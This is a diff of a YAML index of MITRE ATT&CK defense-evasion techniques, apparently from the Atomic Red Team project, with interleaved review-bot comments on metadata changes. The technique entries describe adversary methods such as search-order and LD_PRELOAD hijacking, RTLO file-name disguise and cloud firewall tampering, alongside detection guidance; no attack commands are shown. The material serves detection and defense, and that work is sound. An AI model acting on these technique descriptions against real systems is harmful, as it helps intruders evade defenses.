Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -6421,8 +6561,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests: []
T1553.006:
@@ -6512,7 +6650,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -6536,12 +6674,11 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -6620,7 +6757,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1112:
@@ -6705,12 +6841,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -6729,6 +6864,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -6736,7 +6872,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -6756,29 +6891,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests: []
T1535:
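Review bot: the Windows NT Command Shell entry in T1574.008 keeps its December 5, 2014 retrieval date and docs.microsoft.com previous-versions URL while the adjacent Microsoft CreateProcess and Microsoft WinExec entries were re-verified on September 12, 2024 and moved to learn.microsoft.com; if that link was checked in the same pass its date should be refreshed too, and if it was not, it is the one reference in this block still worth verifying. The new CreateProcess URL points at the CreateProcessA page specifically, which is fine for the citation but narrower than the generic function page it replaced.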
@@ -6829,7 +6966,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.001:
technique:
@@ -6896,7 +7032,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1027.001
atomic_tests:
- name: Pad Binary to Change Hash - Linux/macOS dd
@@ -6968,7 +7103,7 @@ defense-evasion:
name: sh
T1484.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-23T22:11:01.884Z'
name: 'Domain Policy Modification: Group Policy Modification'
description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
the intended discretionary access controls for a domain, usually with the
@@ -7004,6 +7139,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -7015,16 +7154,12 @@ defense-evasion:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -7060,12 +7195,12 @@ defense-evasion:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -7073,14 +7208,13 @@ defense-evasion:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -7095,6 +7229,7 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -7103,18 +7238,18 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -7146,9 +7281,6 @@ defense-evasion:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest Account on macOS
@@ -7164,7 +7296,7 @@ defense-evasion:
elevation_required: true
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -7285,7 +7417,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests:
- name: Dylib Injection via DYLD_INSERT_LIBRARIES
@@ -7400,12 +7531,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.001
atomic_tests: []
T1222:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T17:54:06.038Z'
name: File and Directory Permissions Modification
description: "Adversaries may modify file or directory permissions/attributes
to evade access control lists (ACLs) and access protected files.(Citation:
@@ -7502,12 +7632,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -7539,11 +7668,10 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -7584,11 +7712,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -7644,12 +7771,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -7706,7 +7832,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests:
- name: Make and modify binary from C source
@@ -7815,7 +7940,7 @@ defense-evasion:
description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
Against Russian Banks. Retrieved March 7, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:52:49.877Z'
name: 'Signed Binary Proxy Execution: Odbcconf'
description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -7848,13 +7973,11 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.008
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -7916,10 +8039,9 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -7977,7 +8099,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -8019,7 +8140,7 @@ defense-evasion:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -8078,41 +8199,10 @@ defense-evasion:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1578.003:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
- type: attack-pattern
- created: '2020-06-16T17:23:06.508Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.003
- url: https://attack.mitre.org/techniques/T1578/003
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS CloudTrail Search
- url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
- description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
- Retrieved June 17, 2020.
- - source_name: Azure Activity Logs
- url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
- description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
- 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-30T13:28:37.415Z'
name: Delete Cloud Instance
description: |-
An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
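Review bot: T1055.013 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` here with no replacement visible in the hunk, the same gap T1599.001 shows earlier in this diff; confirm the key is re-emitted for that object. The large removal of the T1578.003 header block (platforms, domains, id, created, external_references) is a reorder rather than a deletion, since those fields reappear below the description in the next hunk, but the diff makes that hard to verify at a glance; noting the field-order change in the commit message would help.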
@@ -8121,20 +8211,50 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Arun Seelagan, CISA
+ x_mitre_deprecated: false
x_mitre_detection: |-
The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
In AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances
event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete
to delete a VM.(Citation: Cloud Audit Logs)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Instance: Instance Metadata'
- 'Instance: Instance Deletion'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+ created: '2020-06-16T17:23:06.508Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/003
+ external_id: T1578.003
+ - source_name: AWS CloudTrail Search
+ description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+ Retrieved June 17, 2020.
+ url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure Activity Logs
+ description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+ 2020.
+ url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574.005:
technique:
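Review bot: the new `Mandiant M-Trends 2020` entry under `external_references` has no matching `(Citation: Mandiant M-Trends 2020)` marker anywhere in the description or detection text visible in this hunk, which cite only `AWS CloudTrail Search`, `Azure Activity Logs` and `Cloud Audit Logs`; if the marker is not on an unchanged line of the description, the reference is orphaned and should either be dropped or the citing sentence carried over from upstream. The hunk also silently removes `x_mitre_permissions_required: - User` from T1578.003 while other technique blocks in this patch (T1600.002, T1218.005) keep that field as unchanged context, so the PR description should say whether upstream dropped it for this object. Separately, the `aws.amazon.com/premiumsupport/knowledge-center/...` URL is re-emitted with its 2020 retrieval date; confirm it still resolves rather than carrying a stale link forward.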
@@ -8164,7 +8284,7 @@ defense-evasion:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
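Review bot: `modified` moves backwards here, from `2020-10-27T14:49:39.188Z` to `2020-03-26T19:20:23.030Z`, and the same regression recurs in the T1036.002, T1542.002, T1055.004, T1647, T1600.002, T1612, T1055.002, T1218.012, T1218.005, T1205.001, T1564.002 and T1562.003 hunks. Every old value that regresses ends in `.188Z` (mostly `14:00:00.188Z`), which looks like a release-stamped timestamp rather than the object's own last-modified time, so this is most likely the regenerated index picking up the real STIX `modified` value; state that in the PR description, because any consumer that compares `modified` to detect updated techniques will see these objects as unchanged or older after this merge. While here, the unchanged Kanthak reference above reads `(2015, December 8) ... Retrieved December 4, 2014`, a retrieval date earlier than the publication date, which is an upstream data error worth reporting upstream rather than patching locally.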
@@ -8199,8 +8319,6 @@ defense-evasion:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1562.006:
technique:
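Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1574.005 without adding a replacement, whereas the other blocks in this patch either end up with `x_mitre_attack_spec_version: 3.2.0` or keep their `2.1.0` line as unchanged context (T1647, T1218.012, T1564.002); the same both-fields removal happens for T1036.002, T1542.002, T1055.004, T1600.002, T1055.002, T1218.005 and T1205.001. Dropping `spec_version` everywhere is fine if nothing consumes these objects as STIX 2.1, but the ATT&CK spec version should still survive somewhere in each object; confirm it does, otherwise the generator is silently losing the field for techniques upstream has not re-serialised since spec 2.1.0.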
@@ -8291,12 +8409,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.006
atomic_tests: []
T1562.007:
technique:
- modified: '2023-04-15T00:25:36.502Z'
+ modified: '2024-10-16T19:38:57.374Z'
name: Disable or Modify Cloud Firewall
description: "Adversaries may disable or modify a firewall within a cloud environment
to bypass controls that limit access to cloud resources. Cloud firewalls are
@@ -8304,19 +8421,25 @@ defense-evasion:
Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments
typically utilize restrictive security groups and firewall rules that only
allow network activity from trusted IP addresses via expected ports and protocols.
- An adversary may introduce new firewall rules or policies to allow access
- into a victim cloud environment. For example, an adversary may use a script
- or utility that creates new ingress rules in existing security groups to allow
- any TCP/IP connectivity, or remove networking limitations to support traffic
- associated with malicious activity (such as cryptomining).(Citation: Expel
- IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials
- 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications,
- lateral movement, and/or data exfiltration that would otherwise not be allowed."
+ An adversary with appropriate permissions may introduce new firewall rules
+ or policies to allow access into a victim cloud environment and/or move laterally
+ from the cloud control plane to the data plane. For example, an adversary
+ may use a script or utility that creates new ingress rules in existing security
+ groups (or creates new security groups entirely) to allow any TCP/IP connectivity
+ to a cloud-hosted instance.(Citation: Palo Alto Unit 42 Compromised Cloud
+ Compute Credentials 2022) They may also remove networking limitations to support
+ traffic associated with malicious activity (such as cryptomining).(Citation:
+ Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute
+ Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary
+ C2 communications, lateral movement, and/or data exfiltration that would otherwise
+ not be allowed. It may also be used to open up resources for [Brute Force](https://attack.mitre.org/techniques/T1110)
+ or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_contributors:
- Expel
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor cloud logs for modification or creation of new security
groups or firewall rules.
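Review bot: the rewritten description string ends with a space before the closing quote (`or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499). "`), so the stored value now carries trailing whitespace; if this mirrors upstream verbatim it is acceptable, but stripping description fields in the generator would keep the index clean and avoid churn when upstream fixes it. The unchanged detection text (`Monitor cloud logs for modification or creation of new security groups or firewall rules.`) already covers the new `creates new security groups entirely` wording, so no change is needed there.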
@@ -8325,7 +8448,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Firewall: Firewall Disable'
- 'Firewall: Firewall Rule Modification'
@@ -8348,9 +8471,8 @@ defense-evasion:
url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.002:
technique:
@@ -8383,7 +8505,7 @@ defense-evasion:
description: Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram
- Cybercriminals exploited Telegram flaw to launch multipurpose attacks.
Retrieved April 22, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:01:59.733Z'
name: Right-to-Left Override
description: |-
Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \u202Excod.scr
will display as March 25 rcs.docx
. A JavaScript file named photo_high_re\u202Egnp.js
will be displayed as photo_high_resj.png
.(Citation: Infosecinstitute RTLO Technique)
@@ -8402,8 +8524,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.002:
technique:
@@ -8434,7 +8554,7 @@ defense-evasion:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
